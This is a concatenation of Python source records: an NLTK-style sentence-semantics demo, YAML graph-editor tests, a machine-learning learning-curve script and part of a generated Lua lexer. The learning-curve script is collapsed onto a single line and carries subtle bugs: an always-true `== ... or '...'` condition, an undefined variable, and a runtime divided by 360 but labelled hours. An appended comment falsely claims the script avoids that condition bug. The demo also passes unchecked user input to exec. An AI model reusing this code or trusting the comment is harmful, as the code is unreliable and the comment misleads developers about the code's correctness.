        syn, sem = reading[0]
        print()
        print("output: ", sem)


def demo():
    import sys
    from optparse import OptionParser

    description = \
    """
    Parse and evaluate some sentences.
    """

    opts = OptionParser(description=description)

    opts.set_defaults(evaluate=True, beta=True, syntrace=0,
                      semtrace=0, demo='default', grammar='', sentences='')

    opts.add_option("-d", "--demo", dest="demo",
                    help="choose demo D; omit this for the default demo, "
                         "or specify 'chat80'", metavar="D")
    opts.add_option("-g", "--gram", dest="grammar",
                    help="read in grammar G", metavar="G")
    opts.add_option("-m", "--model", dest="model",
                    help="import model M (omit '.py' suffix)", metavar="M")
    opts.add_option("-s", "--sentences", dest="sentences",
                    help="read in a file of test sentences S", metavar="S")
    opts.add_option("-e", "--no-eval", action="store_false", dest="evaluate",
                    help="just do a syntactic analysis")
    opts.add_option("-b", "--no-beta-reduction", action="store_false",
                    dest="beta", help="don't carry out beta-reduction")
    opts.add_option("-t", "--syntrace", action="count", dest="syntrace",
                    help="set syntactic tracing on; requires '-e' option")
    opts.add_option("-T", "--semtrace", action="count", dest="semtrace",
                    help="set semantic tracing on")

    (options, args) = opts.parse_args()

    SPACER = '-' * 30

    demo_model0()

    sents = [
        'Fido sees a boy with Mary',
        'John sees Mary',
        'every girl chases a dog',
        'every boy chases a girl',
        'John walks with a girl in Noosa',
        'who walks']

    gramfile = 'grammars/sample_grammars/sem2.fcfg'

    if options.sentences:
        sentsfile = options.sentences
    if options.grammar:
        gramfile = options.grammar
    if options.model:
        exec("import %s as model" % options.model)

    if options.sentences:
        sents = read_sents(sentsfile)

    # Set model and assignment
    model = m0
    g = g0

    if options.evaluate:
        evaluations = \
            batch_evaluate(sents, gramfile, model, g, trace=options.semtrace)
    else:
        semreps = \
            batch_interpret(sents, gramfile, trace=options.syntrace)

    for i, sent in enumerate(sents):
        n = 1
        print('\nSentence: %s' % sent)
        print(SPACER)
        if options.evaluate:
            for (syntree, semrep, value) in evaluations[i]:
                if isinstance(value, dict):
                    value = set(value.keys())
                print('%d: %s' % (n, semrep))
                print(value)
                n += 1
        else:
            for (syntree, semrep) in semreps[i]:
                print('%d: %s' % (n, semrep))
                n += 1


if __name__ == "__main__":
    #demo()
    demo_legacy_grammar()
# ==== StarcoderdataPython record 155100 ====
# gh_stars: 1-10
import re
import textwrap
from pathlib import Path

from patterns.configuration.edit import GraphConfigEditor


def test_round_trip(tmp_path: Path):
    s = """
    title: graph
    functions:
      - webhook: out # eol comment
      # node 1
      - node_file: node_1.py
        inputs:
          in: out
    """
    get_editor(tmp_path, s).assert_dump(s)


def test_round_trip_no_indent(tmp_path: Path):
    s = """
    functions:
    - webhook: out # eol comment
    - node_file: node_1.py
      inputs:
        in: out
    """
    get_editor(tmp_path, s).assert_dump(s)


def test_add_node_to_existing_nodes(tmp_path: Path):
    before = """
    functions:
      - webhook: out # eol comment
    """
    after = """
    functions:
      - webhook: out # eol comment
      - node_file: node.py
        id: <id>
    """
    get_editor(tmp_path, before).add_node("node.py").assert_dump(after)


def test_add_node_to_empty_graph(tmp_path: Path):
    before = """
    title: graph
    """
    after = """
    title: graph
    functions:
      - node_file: node.py
        id: <id>
    """
    get_editor(tmp_path, before).add_node("node.py").assert_dump(after)


def test_add_webhook_with_all_fields(tmp_path: Path):
    before = """
    title: graph
    """
    after = """
    title: graph
    functions:
      - webhook: hook
        title: n
        id: ab234567
        description: desc
    """
    get_editor(tmp_path, before).add_webhook(
        "hook", "n", "ab234567", "desc"
    ).assert_dump(after)


def test_add_store_with_all_fields(tmp_path: Path):
    before = """
    title: graph
    """
    after = """
    title: graph
    stores:
      - stream: st
        title: n
        id: ab234567
        schema: sc
    """
    get_editor(tmp_path, before).add_store(
        "st", False, "n", "ab234567", "sc"
    ).assert_dump(after)


def test_add_node_with_all_fields(tmp_path: Path):
    before = """
    title: graph
    functions:
      - webhook: hook
    """
    after = """
    title: graph
    functions:
      - webhook: hook
      - node_file: node.py
        schedule: daily
        inputs:
          node_in: hook
        outputs:
          node_out: my_table
        parameters:
          limit: 2
        title: my node
        id: ab234567
        description: desc
    """
    get_editor(tmp_path, before).add_node(
        "node.py",
        schedule="daily",
        inputs={"node_in": "hook"},
        outputs={"node_out": "my_table"},
        parameters={"limit": 2},
        title="my node",
        id="ab234567",
        description="desc",
    ).assert_dump(after)


def test_add_component_with_all_fields(tmp_path: Path):
    before = """
    title: graph
    functions:
      - webhook: hook
    """
    after = """
    title: graph
    functions:
      - webhook: hook
      - uses: org/component@v1
        schedule: daily
        inputs:
          node_in: hook
        outputs:
          node_out: my_table
        parameters:
          limit: 2
        title: my node
        id: ab234567
        description: desc
    """
    get_editor(tmp_path, before).add_component_uses(
        "org/component@v1",
        schedule="daily",
        inputs={"node_in": "hook"},
        outputs={"node_out": "my_table"},
        parameters={"limit": 2},
        title="my node",
        id="ab234567",
        description="desc",
    ).assert_dump(after)


def test_add_missing_node_ids(tmp_path: Path):
    before = """
    functions:
      - node_file: a.py
        title: a
      - node_file: b.py
        id: foo
      - node_file: c.py
    stores:
      - table: t
      - stream: s
    """
    after = """
    functions:
      - node_file: a.py
        title: a
        id: <id>
      - node_file: b.py
        id: <id>
      - node_file: c.py
        id: <id>
    stores:
      - table: t
        id: <id>
      - stream: s
        id: <id>
    """
    editor = get_editor(tmp_path, before).add_missing_node_ids()
    dump = editor.assert_dump(after)
    assert "id: foo" in dump


def get_editor(tmp_path: Path, s: str) -> "_EditorTester":
    f = tmp_path / "graph.yml"
    s = textwrap.dedent(s).strip()
    f.write_text(s)
    return _EditorTester(f)


class _EditorTester(GraphConfigEditor):
    def assert_dump(self, s: str) -> str:
        s = textwrap.dedent(s).strip()
        dump = self.dump().strip()
        if "<id>" in s:
            dump = re.sub(r"id: \w+", "id: <id>", dump)
        assert dump == s
        return self.dump().strip()
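
# Hedged usage sketch (added for illustration; the call pattern is inferred
# only from the tests above, so the positional argument order passed to
# add_webhook() is an assumption): GraphConfigEditor(path) parses graph.yml,
# add_webhook()/add_node() append entries, and dump() returns the
# round-tripped YAML.
def _example_graph_edit(tmp_path: Path) -> str:
    f = tmp_path / "graph.yml"
    f.write_text("title: graph\n")
    editor = GraphConfigEditor(f)
    editor.add_webhook("out", "my hook", "ab234567", "entry point")
    editor.add_node("node.py", inputs={"in": "out"})
    return editor.dump()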
# ==== StarcoderdataPython record 153123 ====
""" This script generates multiple learning curves for different training sets. It launches a script (e.g. trn_lrn_crv.py) that train ML model(s) on various training set sizes. """ from __future__ import print_function, division import warnings warnings.filterwarnings('ignore') import os import sys from pathlib import Path import argparse from datetime import datetime from time import time from pprint import pprint, pformat from collections import OrderedDict from glob import glob import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt import sklearn import numpy as np import pandas as pd from sklearn.preprocessing import StandardScaler, MinMaxScaler, RobustScaler SEED = 42 # File path # file_path = os.path.dirname(os.path.realpath(__file__)) file_path = Path(__file__).resolve().parent # Utils utils_path = file_path / '../../utils' sys.path.append(str(utils_path)) import utils # from utils_tidy import load_tidy_combined, get_data_by_src, break_src_data from classlogger import Logger from lrn_crv import LearningCurve # Path PRJ_NAME = file_path.name OUTDIR = file_path / '../../out/' / PRJ_NAME def parse_args(args): parser = argparse.ArgumentParser(description="Generate learning curves.") # Input data parser.add_argument('--dirpath', default=None, type=str, help='Full path to data and splits (default: None).') # Select data name # parser.add_argument('--dname', default=None, choices=['combined'], help='Data name (default: `combined`).') # Select (cell line) sources # parser.add_argument('-src', '--src_names', nargs='+', # default=None, choices=['ccle', 'gcsi', 'gdsc', 'ctrp', 'nci60'], # help='Data sources to use (relevant only for the `combined` dataset).') # Select target to predict parser.add_argument('-t', '--target_name', default='AUC', type=str, choices=['AUC', 'AUC1', 'IC50'], help='Name of target variable (default: AUC).') # Select feature types parser.add_argument('-cf', '--cell_features', nargs='+', default=['rna'], choices=['rna', 'cnv', 'clb'], help='Cell line features (default: rna).') parser.add_argument('-df', '--drug_features', nargs='+', default=['dsc'], choices=['dsc', 'fng', 'dlb'], help='Drug features (default: dsc).') parser.add_argument('-of', '--other_features', default=[], choices=[], help='Other feature types (derived from cell lines and drugs). 
E.g.: cancer type, etc).') # ['cell_labels', 'drug_labels', 'ctype', 'csite', 'rna_clusters'] # Data split methods parser.add_argument('-cvm', '--cv_method', default='simple', type=str, choices=['simple', 'group'], help='CV split method (default: simple).') parser.add_argument('-cvf', '--cv_folds', default=5, type=str, help='Number cross-val folds (default: 5).') # ML models # parser.add_argument('-frm', '--framework', default='lightgbm', type=str, choices=['keras', 'lightgbm', 'sklearn'], help='ML framework (default: lightgbm).') parser.add_argument('-ml', '--model_name', default='lgb_reg', type=str, # choices=['lgb_reg', 'rf_reg', 'nn_reg', 'nn_reg0', 'nn_reg1', 'nn_reg2', 'nn_reg3', 'nn_reg4'], help='ML model for training (default: lgb_reg).') # NN hyper_params parser.add_argument('-ep', '--epochs', default=200, type=int, help='Number of epochs (default: 200).') parser.add_argument('--batch_size', default=32, type=int, help='Batch size (default: 32).') parser.add_argument('--dr_rate', default=0.2, type=float, help='Dropout rate (default: 0.2).') parser.add_argument('-sc', '--scaler', default='stnd', type=str, choices=['stnd', 'minmax', 'rbst'], help='Feature normalization method (default: stnd).') parser.add_argument('--opt', default='sgd', type=str, choices=['sgd', 'adam'], help='Optimizer name (default: sgd).') parser.add_argument('--clr_mode', default=None, type=str, choices=['trng1', 'trng2', 'exp'], help='CLR mode (default: trng1).') parser.add_argument('--clr_base_lr', type=float, default=1e-4, help='Base lr for cycle lr.') parser.add_argument('--clr_max_lr', type=float, default=1e-3, help='Max lr for cycle lr.') parser.add_argument('--clr_gamma', type=float, default=0.999994, help='Gamma parameter for learning cycle LR.') # Learning curve parser.add_argument('--n_shards', default=5, type=int, help='Number of ticks in the learning curve plot (default: 5).') # Define n_jobs parser.add_argument('--n_jobs', default=4, type=int, help='Default: 4.') # Parse args args = parser.parse_args(args) return args def create_outdir(outdir, args, src): t = datetime.now() t = [t.year, '-', t.month, '-', t.day, '_', 'h', t.hour, '-', 'm', t.minute] t = ''.join([str(i) for i in t]) l = [('cvf'+str(args['cv_folds']))] + args['cell_features'] + args['drug_features'] + [args['target_name']] if args['clr_mode'] is not None: l = [args['clr_mode']] + l if 'nn' in args['model_name']: l = [args['opt']] + l name_sffx = '.'.join( [src] + [args['model_name']] + l ) outdir = Path(outdir) / (name_sffx + '_' + t) #outdir = Path(outdir) / name_sffx os.makedirs(outdir) #os.makedirs(outdir, exist_ok=True) return outdir def run(args): dirpath = Path(args['dirpath']) # dname = args['dname'] # src_names = args['src_names'] # Target target_name = args['target_name'] # Data split cv_folds = args['cv_folds'] # Features cell_fea = args['cell_features'] drug_fea = args['drug_features'] other_fea = args['other_features'] fea_list = cell_fea + drug_fea + other_fea # NN params epochs = args['epochs'] batch_size = args['batch_size'] dr_rate = args['dr_rate'] # Optimizer opt_name = args['opt'] clr_keras_kwargs = {'mode': args['clr_mode'], 'base_lr': args['clr_base_lr'], 'max_lr': args['clr_max_lr'], 'gamma': args['clr_gamma']} # Learning curve n_shards = args['n_shards'] # Other params # framework = args['framework'] model_name = args['model_name'] n_jobs = args['n_jobs'] # ML type ('reg' or 'cls') if 'reg' in model_name: mltype = 'reg' elif 'cls' in model_name: mltype = 'cls' else: raise ValueError("model_name must contain 
'reg' or 'cls'.") # Define metrics # metrics = {'r2': 'r2', # 'neg_mean_absolute_error': 'neg_mean_absolute_error', #sklearn.metrics.neg_mean_absolute_error, # 'neg_median_absolute_error': 'neg_median_absolute_error', #sklearn.metrics.neg_median_absolute_error, # 'neg_mean_squared_error': 'neg_mean_squared_error', #sklearn.metrics.neg_mean_squared_error, # 'reg_auroc_score': utils.reg_auroc_score} # ======================================================================== # Load data and pre-proc # ======================================================================== dfs = {} def get_file(fpath): return pd.read_csv(fpath, header=None).squeeze().values if fpath.is_file() else None def read_data_file(fpath, file_format='csv'): fpath = Path(fpath) if fpath.is_file(): if file_format=='csv': df = pd.read_csv( fpath ) elif file_format=='parquet': df = pd.read_parquet( fpath ) else: df = None return df if dirpath is not None: xdata = read_data_file( dirpath/'xdata.parquet', 'parquet' ) meta = read_data_file( dirpath/'meta.parquet', 'parquet' ) ydata = meta[[target_name]] tr_id = pd.read_csv( dirpath/f'{cv_folds}fold_tr_id.csv' ) vl_id = pd.read_csv( dirpath/f'{cv_folds}fold_vl_id.csv' ) # tr_ids_list = get_file( dirpath/f'{cv_folds}fold_tr_id.csv' ) # vl_ids_list = get_file( dirpath/f'{cv_folds}fold_vl_id.csv' ) # te_ids_list = get_file( dirpath/f'{cv_folds}fold_te_id.csv' ) src = dirpath.name.split('_')[0] dfs[src] = (ydata, xdata, tr_id, vl_id) elif dname == 'combined': # TODO: this is not used anymore (probably won't work) DATADIR = file_path / '../../data/processed/data_splits' DATAFILENAME = 'data.parquet' dirs = glob( str(DATADIR/'*') ) for src in src_names: print(f'\n{src} ...') subdir = f'{src}_cv_{cv_method}' if str(DATADIR/subdir) in dirs: # Get the CV indexes tr_id = pd.read_csv( DATADIR/subdir/f'{cv_folds}fold_tr_id.csv' ) vl_id = pd.read_csv( DATADIR/subdir/f'{cv_folds}fold_vl_id.csv' ) # Get the data datapath = DATADIR / subdir / DATAFILENAME data = pd.read_parquet( datapath ) xdata, _, meta, _ = break_src_data(data, target=None, scaler=None) # logger=lg.logger ydata = meta[[target_name]] dfs[src] = (ydata, xdata, tr_id, vl_id) del data, xdata, ydata, tr_id, vl_id, src for src, data in dfs.items(): ydata, xdata, tr_id, vl_id = data[0], data[1], data[2], data[3] # Scale scaler = args['scaler'] if scaler is not None: if scaler == 'stnd': scaler = StandardScaler() elif scaler == 'minmax': scaler = MinMaxScaler() elif scaler == 'rbst': scaler = RobustScaler() cols = xdata.columns xdata = pd.DataFrame(scaler.fit_transform(xdata), columns=cols, dtype=np.float32) # ----------------------------------------------- # Create outdir and logger # ----------------------------------------------- run_outdir = create_outdir(OUTDIR, args, src) lg = Logger(run_outdir/'logfile.log') lg.logger.info(f'File path: {file_path}') lg.logger.info(f'\n{pformat(args)}') # Dump args to file utils.dump_dict(args, outpath=run_outdir/'args.txt') # ----------------------------------------------- # ML model configs # ----------------------------------------------- if model_name == 'lgb_reg': framework = 'lightgbm' init_kwargs = {'n_jobs': n_jobs, 'random_state': SEED, 'logger': lg.logger} fit_kwargs = {'verbose': False} elif model_name == 'nn_reg': framework = 'keras' init_kwargs = {'input_dim': xdata.shape[1], 'dr_rate': dr_rate, 'opt_name': opt_name, 'attn': attn, 'logger': lg.logger} fit_kwargs = {'batch_size': batch_size, 'epochs': epochs, 'verbose': 1} elif model_name == 'nn_reg0' or 'nn_reg1' or 'nn_reg2': 
framework = 'keras' init_kwargs = {'input_dim': xdata.shape[1], 'dr_rate': dr_rate, 'opt_name': opt_name, 'logger': lg.logger} fit_kwargs = {'batch_size': batch_size, 'epochs': epochs, 'verbose': 1} # 'validation_split': 0.1 elif model_name == 'nn_reg3' or 'nn_reg4': framework = 'keras' init_kwargs = {'in_dim_rna': None, 'in_dim_dsc': None, 'dr_rate': dr_rate, 'opt_name': opt_name, 'logger': lg.logger} fit_kwargs = {'batch_size': batch_size, 'epochs': epochs, 'verbose': 1} # 'validation_split': 0.1 # ----------------------------------------------- # Learning curve # ----------------------------------------------- lg.logger.info('\n\n{}'.format('=' * 50)) lg.logger.info(f'Learning curves {src} ...') lg.logger.info('=' * 50) t0 = time() lc = LearningCurve( X=xdata, Y=ydata, cv=None, cv_lists=(tr_id, vl_id), n_shards=n_shards, shard_step_scale='log10', args=args, logger=lg.logger, outdir=run_outdir ) lrn_crv_scores = lc.trn_learning_curve( framework=framework, mltype=mltype, model_name=model_name, init_kwargs=init_kwargs, fit_kwargs=fit_kwargs, clr_keras_kwargs=clr_keras_kwargs, n_jobs=n_jobs, random_state=SEED ) lg.logger.info('Runtime: {:.1f} hrs'.format( (time()-t0)/360) ) # ------------------------------------------------- # Learning curve (sklearn method) # Problem! cannot log multiple metrics. # ------------------------------------------------- """ lg.logger.info('\nStart learning curve (sklearn method) ...') # Define params metric_name = 'neg_mean_absolute_error' base = 10 train_sizes_frac = np.logspace(0.0, 1.0, lc_ticks, endpoint=True, base=base)/base # Run learning curve t0 = time() lrn_curve_scores = learning_curve( estimator=model.model, X=xdata, y=ydata, train_sizes=train_sizes_frac, cv=cv, groups=groups, scoring=metric_name, n_jobs=n_jobs, exploit_incremental_learning=False, random_state=SEED, verbose=1, shuffle=False) lg.logger.info('Runtime: {:.1f} mins'.format( (time()-t0)/60) ) # Dump results # lrn_curve_scores = utils.cv_scores_to_df(lrn_curve_scores, decimals=3, calc_stats=False) # this func won't work # lrn_curve_scores.to_csv(os.path.join(run_outdir, 'lrn_curve_scores_auto.csv'), index=False) # Plot learning curves lrn_crv.plt_learning_curve(rslt=lrn_curve_scores, metric_name=metric_name, title='Learning curve (target: {}, data: {})'.format(target_name, tr_sources_name), path=os.path.join(run_outdir, 'auto_learning_curve_' + target_name + '_' + metric_name + '.png')) """ lg.kill_logger() del xdata, ydata print('Done.') def main(args): args = parse_args(args) args = vars(args) run(args) if __name__ == '__main__': main(sys.argv[1:])
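
# Illustrative note (added; not part of the original script): the membership
# tests used in the model-config branches above avoid the classic pitfall
# ``x == 'a' or 'b'``, which Python parses as ``(x == 'a') or 'b'`` and is
# therefore always truthy regardless of x.
def _truthiness_pitfall_demo():
    model_name = 'lgb_reg'
    broken = (model_name == 'nn_reg0' or 'nn_reg1')  # evaluates to 'nn_reg1'
    fixed = model_name in ('nn_reg0', 'nn_reg1')     # False, as intended
    assert bool(broken) is True and fixed is False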
# ==== StarcoderdataPython record 3257265 ====
<filename>runtests/python_lua/lua_lexer.py from _tbnf.FableSedlex.sedlex import * import typing import typing_extensions import dataclasses _sedlex_rnd_379 = [ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, None, None, 55, 56, 57, 58, 59, -1 ] # token_ids def _sedlex_st_145(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 53) state_id = _sedlex_decide_14(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_378[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_377(lexerbuf: lexbuf): result = -1 result = 54 return result def _sedlex_st_141(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 49) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_376[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_375(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_140(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_25(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_374[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_373(lexerbuf: lexbuf): result = -1 result = _sedlex_st_141(lexerbuf) return result def _sedlex_rnd_372(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_139(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_34(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_371[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_370(lexerbuf: lexbuf): result = -1 result = _sedlex_st_140(lexerbuf) return result def _sedlex_rnd_369(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_138(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_31(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_368[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_367(lexerbuf: lexbuf): result = -1 result = _sedlex_st_139(lexerbuf) return result def _sedlex_rnd_366(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_137(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_42(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_365[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_42(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_35[c - 48] - 1 else: return -1 def _sedlex_rnd_364(lexerbuf: lexbuf): result = -1 result = _sedlex_st_138(lexerbuf) return result def _sedlex_rnd_363(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_136(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 48) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_362[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_361(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_135(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_34(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_360[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_359(lexerbuf: lexbuf): result = -1 
result = _sedlex_st_136(lexerbuf) return result def _sedlex_rnd_358(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_134(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_31(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_357[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_356(lexerbuf: lexbuf): result = -1 result = _sedlex_st_135(lexerbuf) return result def _sedlex_rnd_355(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_133(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_36(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_354[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_353(lexerbuf: lexbuf): result = -1 result = _sedlex_st_134(lexerbuf) return result def _sedlex_rnd_352(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_132(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_22(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_351[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_350(lexerbuf: lexbuf): result = -1 result = _sedlex_st_133(lexerbuf) return result def _sedlex_rnd_349(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_131(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 47) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_348[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_347(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_130(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_25(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_346[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_345(lexerbuf: lexbuf): result = -1 result = _sedlex_st_131(lexerbuf) return result def _sedlex_rnd_344(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_129(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_40(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_343[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_342(lexerbuf: lexbuf): result = -1 result = _sedlex_st_130(lexerbuf) return result def _sedlex_rnd_341(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_128(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 46) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_340[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_339(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_127(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_22(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_338[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_337(lexerbuf: lexbuf): result = -1 result = _sedlex_st_128(lexerbuf) return result def _sedlex_rnd_336(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_126(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_25(public_next_int(lexerbuf)) if 
state_id >= 0: result = _sedlex_rnd_335[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_334(lexerbuf: lexbuf): result = -1 result = _sedlex_st_127(lexerbuf) return result def _sedlex_rnd_333(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_125(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_41(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_332[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_41(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_34[c - 48] - 1 else: return -1 def _sedlex_rnd_331(lexerbuf: lexbuf): result = -1 result = _sedlex_st_129(lexerbuf) return result def _sedlex_rnd_330(lexerbuf: lexbuf): result = -1 result = _sedlex_st_126(lexerbuf) return result def _sedlex_rnd_329(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_124(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 45) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_328[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_327(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_123(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_22(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_326[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_325(lexerbuf: lexbuf): result = -1 result = _sedlex_st_124(lexerbuf) return result def _sedlex_rnd_324(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_122(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_24(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_323[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_322(lexerbuf: lexbuf): result = -1 result = _sedlex_st_123(lexerbuf) return result def _sedlex_rnd_321(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_121(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_40(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_320[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_40(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_33[c - 48] - 1 else: return -1 def _sedlex_rnd_319(lexerbuf: lexbuf): result = -1 result = _sedlex_st_122(lexerbuf) return result def _sedlex_rnd_318(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_120(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 44) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_317[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_316(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_119(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_36(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_315[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_314(lexerbuf: lexbuf): result = -1 result = _sedlex_st_120(lexerbuf) return result def _sedlex_rnd_313(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_118(lexerbuf: lexbuf): result = -1 
